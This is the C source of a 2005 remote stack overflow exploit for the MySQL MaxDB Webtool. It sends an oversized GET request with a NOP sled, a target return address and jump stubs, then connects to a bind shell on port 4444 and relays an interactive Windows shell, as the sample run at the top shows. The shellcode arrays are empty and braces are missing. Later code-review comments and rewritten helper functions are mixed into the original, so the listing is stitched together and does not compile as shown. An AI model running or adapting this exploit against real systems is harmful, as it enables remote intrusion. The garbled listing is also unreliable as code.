* MySQL MaxDB Webtool Remote Stack Overflow Exploit
* cybertronic[at]gmx[dot]net
* 04/27/2005
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ select target
* --[ 0 [0x100163d2] esi ebp ret
* --[ 1 [0xdeadc0de] crash server
* >> 0
* --[ connecting to!
* --[ sending packet [ 16383 bytes ]...done!
* --[ sleeping 5 seconds before connecting to
* --[ connecting to!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
* C:\WINDOWS\system32>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 9999 /* TCP port main() connects to on the host given in argv[1] */
/* ANSI SGR colour sequences used in the status messages. "\E" is a GCC
 * extension for the ESC (0x1b) character, not portable C; "\x1b" is the
 * standard spelling. BLUE and GREEN are defined but not used on this page. */
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
* prototypes
/* Prototypes. Note that the definitions further down appear on this listing
 * without a return type (e.g. `header ()`, `wait ( int sec )`); if that is how
 * the file really reads and not an extraction artefact, they rely on implicit
 * int, which C99 removed, and conflict with the `void` declarations here. */
int exploit ( int s, unsigned long ret );                      /* build and send the request; 0 on success, 1 if write() fails */
int isip ( char *ip );                                         /* 1 if ip parses as dotted quad a.b.c.d in range, else 0 */
int shell ( int s, char* tip, unsigned short cbport );         /* relay stdin/stdout <-> socket s until an error */
void connect_to_bindshell ( char* tip, unsigned short bport ); /* resolve tip, pause, connect to tip:bport, then shell() */
void header ();                                                /* print the ASCII banner */
void wait ( int sec );                                         /* sleep(sec); same name as POSIX wait(2) from <sys/wait.h> */
* Windows Shellcode *
/* win32_bind */
/* Payload byte strings. On this listing bindshell and jmp1 carry no
 * initializer (their bytes are absent, so the file as shown does not
 * compile); only jmp2 has content. exploit() copies each one with
 * sizeof(x) - 1 so the string's terminating NUL is left out. */
unsigned char bindshell[] =
unsigned char jmp1[] =
unsigned char jmp2[] =
"\xe9\xe2\xf7\xff\xff"; //jmp -2078
* structures
/* Target table: one row per selectable entry. main() prints rows 0..1 with a
 * hard-coded loop bound and indexes the table with the number read from
 * stdin, so `num` must equal the row's array index. */
struct targets {
int num;            /* menu number, must match the row's index */
unsigned long ret;  /* value exploit() writes into the request at offset 3661 */
char name[64];      /* label shown in the target menu */
target[]= {
{ 0, 0x100163d2, "WinXP Pro SP1 GER" }, //tested working on my WinXP Pro SP1 box [ pop pop ret in wapi.dll ]
{ 1, 0xdeadc0de, "crash server" },      /* not a real address: a deliberate crash-only entry */
* functions
/*
 * exploit: build the oversized GET request and send it over socket s.
 *
 * s   - socket already connected by main() to the target's PORT
 * ret - value copied into the request at offset 3661 (taken from target[].ret)
 * Returns 0 when write() reports success, 1 when write() returns <= 0.
 *
 * Defender's view: the request line is "GET /%" followed by roughly 16 KB of
 * 0x90 bytes before "HTTP/1.0"; a request-line length limit at a reverse
 * proxy, or an IDS signature on that prefix, rejects this shape of request.
 *
 * Note: <string.h>, <strings.h> and <unistd.h> are not among the includes at
 * the top of this file, so bzero/memset/strncpy/memcpy/strlen/write are
 * called here without prototypes.
 */
exploit ( int s, unsigned long ret )
char buffer[16384];
bzero ( &buffer, sizeof ( buffer ) );
/* fill all but the last 13 bytes with 0x90: the 13 spare bytes hold the
 * 12-byte "HTTP/1.0\r\n\r\n" appended by strncat below plus the NUL */
memset ( buffer, 0x90, sizeof ( buffer ) -13 );
strncpy ( buffer, "GET /%", 6 );
/* sizeof(x) - 1 drops the NUL terminator of each byte string */
memcpy ( buffer + 1600, bindshell, sizeof ( bindshell ) - 1 );
memcpy ( buffer + 3657, jmp1, sizeof ( jmp1 ) -1 );
/*
 * SEH offset changes for different binary path
 * This exploits WinXP Pro SP1 GER assuming the
 * default path of C:\Programme\sdb\programs\web\Documents
 * English version is supported by metasploit
 * http://www.metasploit.com/projects/Framework/modules/exploits/maxdb_webdbm_get_overflow.pm
 */
/* 4 bytes of ret are written at offset 3661 */
strncpy ( buffer + 3661, ( unsigned char* ) &ret, 4 );
memcpy ( buffer + 3673, jmp2, sizeof ( jmp2 ) -1 );
strncat ( buffer, "HTTP/1.0\r\n\r\n", 12 );
/* %u with a size_t argument is a format/type mismatch; %zu is the matching specifier */
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
/* only write() <= 0 is treated as failure; the braces around the branch
 * bodies appear to have been stripped from this listing */
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
printf ( RED "failed!\n" NORMAL);
return ( 1 );
printf ( YELLOW "done!\n" NORMAL);
return ( 0 );
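/*
 * isip: accept a string only if it parses as four dotted decimal octets.
 *
 * ip - NUL-terminated candidate address; not modified.
 * Returns 1 when all four fields convert and are in range (first octet
 * 1..255, the others 0..255) and nothing follows the fourth field, else 0.
 *
 * Fix vs. the original: the sscanf() count is compared against 4 instead of
 * against 0, so a partial match such as "1.2" no longer leaves b, c and d
 * uninitialized before they are range-checked (undefined behaviour), and a
 * fifth "%c" probe rejects trailing characters such as "1.2.3.4x".
 */
int
isip ( char *ip )
{
	int a = 0, b = 0, c = 0, d = 0;
	char trailing = 0;

	/* exactly four conversions: fewer means a short/garbled address,
	 * a fifth means something follows the last octet */
	if ( sscanf ( ip, "%d.%d.%d.%d%c", &a, &b, &c, &d, &trailing ) != 4 )
		return 0;
	/* the original rejects a leading 0 octet; keep that rule */
	if ( a < 1 || a > 255 )
		return 0;
	if ( b < 0 || b > 255 )
		return 0;
	if ( c < 0 || c > 255 )
		return 0;
	if ( d < 0 || d > 255 )
		return 0;
	return 1;
}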
/*
 * shell: interactive relay between the local terminal and socket s.
 *
 * s      - connected socket
 * tip    - host; not referenced in the body shown here
 * cbport - port; not referenced in the body shown here
 * Each select() round copies whatever is readable on s to stdout (fd 1) and
 * whatever is readable on stdin (fd 0) to s. Every error path prints
 * "bye bye..."; the braces and any exit/return following those printf calls
 * are not visible in this listing, so how the loop terminates and what the
 * function returns cannot be confirmed from here.
 */
shell ( int s, char* tip, unsigned short cbport )
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
/* the set is filled once here and re-armed at the top of every iteration,
 * because select() clears the descriptors that were not ready */
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
/* NULL timeout: blocks until s or stdin becomes readable */
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
/* socket -> stdout. Only a negative recv() is an error; n == 0 (peer
 * closed) falls through to a zero-length write() */
if ( FD_ISSET ( s, &fd_read ) )
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
printf ( "bye bye...\n" );
if ( write ( 1, buffer, n ) < 0 )
printf ( "bye bye...\n" );
/* stdin -> socket, same shape; read() == 0 (EOF) also passes through as n == 0 */
if ( FD_ISSET ( 0, &fd_read ) )
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
printf ( "bye bye...\n" );
if ( send ( s, buffer, n, 0 ) < 0 )
printf ( "bye bye...\n" );
/*
 * connect_to_bindshell: resolve tip, pause `sec` seconds, connect to
 * tip:bport and hand the socket to shell().
 *
 * tip   - host name or dotted address, resolved with gethostbyname()
 * bport - TCP port in host byte order (converted with htons below)
 * Every failure path prints a message and calls exit(1); nothing is returned.
 *
 * Style notes: gethostbyname()/h_addr is the legacy resolver API (getaddrinfo
 * is the current one), and remote_addr is never zeroed, so its sin_zero
 * padding holds stack garbage; harmless for connect() but `= {0}` is the idiom.
 */
connect_to_bindshell ( char* tip, unsigned short bport )
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
remote_addr.sin_family = AF_INET;
/* first address of the result; h_addr is a compatibility alias for h_addr_list[0] */
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
printf ( "socket failed!\n" );
exit ( 1 );
printf ("--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
/* sizeof ( struct sockaddr ) equals sizeof remote_addr for sockaddr_in on
 * common platforms; `sizeof remote_addr` is the clearer spelling */
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
printf ( YELLOW "done!\n" NORMAL);
/* the socket is handed over; whether shell() ever returns here is not visible on this page */
shell ( s, tip, bport );
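/*
 * header: print the ASCII-art banner and author line to stdout.
 *
 * Fix: the definition carries an explicit `void` return type so it agrees
 * with the prototype `void header ();` declared above; a definition without
 * a return type relies on implicit int, which C99 removed. The output is
 * byte-for-byte the same as the printf() sequence it replaces.
 */
void
header ( void )
{
	/* one string per output line, printed verbatim; none contains a format
	 * directive, so fputs() is used instead of printf() */
	static const char *const banner[] = {
		" __ __ _ \n",
		" _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n",
		" / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n",
		"/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n",
		"\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n",
		" /____/ \n\n",
		"--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n",
	};

	for ( size_t i = 0; i < sizeof banner / sizeof banner[0]; i++ )
		fputs ( banner[i], stdout );
}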
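/*
 * wait: block the caller for `sec` seconds (thin wrapper over sleep()).
 *
 * sec - number of seconds; values <= 0 return immediately.
 *
 * Fixes: explicit `void` return type to match the prototype above, and a
 * non-positive count is no longer converted to a huge unsigned sleep.
 * The name shadows POSIX wait(2) should <sys/wait.h> ever be included.
 */
void
wait ( int sec )
{
	if ( sec > 0 )
		sleep ( ( unsigned ) sec );
}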
/*
 * main: usage check, banner, target menu, then connect to argv[1]:PORT, run
 * exploit() and finally connect_to_bindshell().
 *
 * argv[1] - target address; validated with isip() and then resolved with
 *           gethostbyname()
 * Exits 1 on any failure. The braces and the final return of main are not
 * visible on this listing.
 *
 * Review notes on this body:
 * - the scanf() result is unchecked: if stdin does not hold an integer,
 *   `targ` is still uninitialized when it is compared below (undefined
 *   behaviour); initialize it and test `scanf ( "%d", &targ ) == 1`.
 * - the menu loop bound is a literal 2 rather than
 *   sizeof target / sizeof target[0].
 * - system ( "clear" ) spawns a shell just to clear the screen and depends on
 *   PATH and TERM; it is the kind of call normally avoided in a tool.
 * - remote_addr is not zeroed, and the close ( s ) result is ignored.
 */
main ( int argc, char* argv[] )
int s, targ, i;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
printf ( "Usage: %s <ip>\n", argv[0] );
exit ( 1 );
system ( "clear" );
header ();
if ( !isip ( argv[1] ) )
printf ( "Invalid Target IP!\n" );
exit ( 1 );
printf("--[ select target\n");
/* hard-coded row count; must be kept in step with target[] above */
for ( i = 0; i < 2; i++ )
printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
scanf ( "%d", &targ );
/* only 0 and 1 are valid rows; nested ifs stand in for (targ != 0 && targ != 1) */
if ( targ != 0 )
if ( targ != 1 )
printf ( "--[ invalid target!\n" );
exit ( 1 );
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
exit ( 1 );
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
printf ( "socket failed!\n" );
exit ( 1 );
printf ( "--[ connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
printf ( "failed!\n" );
exit ( 1 );
printf ( "done!\n" );
/* exploit() returns 1 only when its write() failed */
if ( exploit ( s, target[targ].ret ) == 1 )
printf ( "exploitation FAILED!\n" );
exit ( 1 );
close ( s );
/* second connection uses a hard-coded port literal */
connect_to_bindshell ( argv[1], 4444 );